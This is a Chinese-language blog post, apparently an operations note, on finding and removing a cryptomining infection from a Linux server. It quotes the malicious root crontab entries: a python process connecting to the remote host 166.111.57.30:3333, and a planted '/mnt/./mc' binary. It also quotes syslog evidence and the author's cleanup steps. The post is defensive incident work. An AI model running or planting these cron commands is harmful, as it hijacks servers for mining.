Linux運維 記錄乙個挖礦病毒

2021-10-23 12:52:14 字數 1156 閱讀 3034

任何程式都會在執行一段時間之後被kill

檢查top命令,得到結果如下:

檢查crontab發現root中被寫入定時服務:用crontab往伺服器寫入了乙個命令,會定時呼叫python程序連線到 166.111.57.30:3333這個位置遠端跑程式。

***

** python -lan 166.111.57.30:3333

檢查發現3333埠前一段時間爆發挖礦病毒,懷疑是166.111.57.30成為校內肉雞。基本確定是挖礦木馬。此條命令清除掉之後,還是有同樣的問題,儘管這個高占用程序不再發生,但是任何程序還是會被無限殺掉,到/var/log中檢查系統日誌(cat /var/log/syslog),發現

jun  9 15:56:01 cbicr cron[22137]: (root) cmd (

/mnt/

./mc -pp 123456)

jun 9 15:56:01 cbicr crontab[22188]: (root) list (root)

jun 9 15:56:01 cbicr crontab[22192]: (root) list (root)

jun 9 15:56:01 cbicr cron[22136]: (cron) info (no mta installed, discarding output)

其中(root) cmd (/mnt/./mc -pp 123456)一條應該是使用者指令,很可能是它造成的問題,檢查root的crontab發現果然有漏網之魚,發現:

***

**/mnt/

./mc -pp 123456

懷疑是乙個掛載進入的病毒,且每分鐘都會清理伺服器資源來給病毒騰空間。清除掉之後伺服器可以正常使用。

發現再次出現類似問題,將以上出現的所有臨時資料夾許可權寫為000,root使用者修改密碼,雖解決問題,最根本的問題應該是伺服器使用了弱密碼被人當成肉機

Linux運維筆記一

網絡卡配置 1修改預設網絡卡配置 vi etc sysconfig network scripts 一般有兩塊網絡卡 ifcfg eth0 第一塊 ifcfg eth1 第二塊 2網絡卡獲取ip有兩種方式 dhcp 動態獲取 static 靜態獲取 3網絡卡引數詳解 device eth0 物理裝置...

LINUX 安全運維 (一)

linux 安全非常重要!曲突徙薪!這個成語的意思是 一人家的廚房堆著大量柴禾,某人指出這樣危險,很容易著火,建議改善 彎曲 煙道,移走柴禾.但主人不聽.一日果真著火,四鄰趕來救援,主人房屋被焚,損失慘重,準備了豐盛食品招待四鄰,唯獨沒有請那個提建議的人.平時做好防禦工作,比出故障了要強吧!linu...

運維乙個系統的思想積累

1.運維乙個架構複雜 上下游依賴比較多的系統,需要一些運維的思想在裡面 1 做乙個系統的定位是什麼?是做乙個通用的平台還是乙個服務於業務的系統 如果是平台就不要牽扯任何的業務,如果是為業務服務的要考慮業務的可擴充套件性,不能來個大的需求就要來次小的重構,工作量太大。2 系統的解耦合 任何乙個系統都存...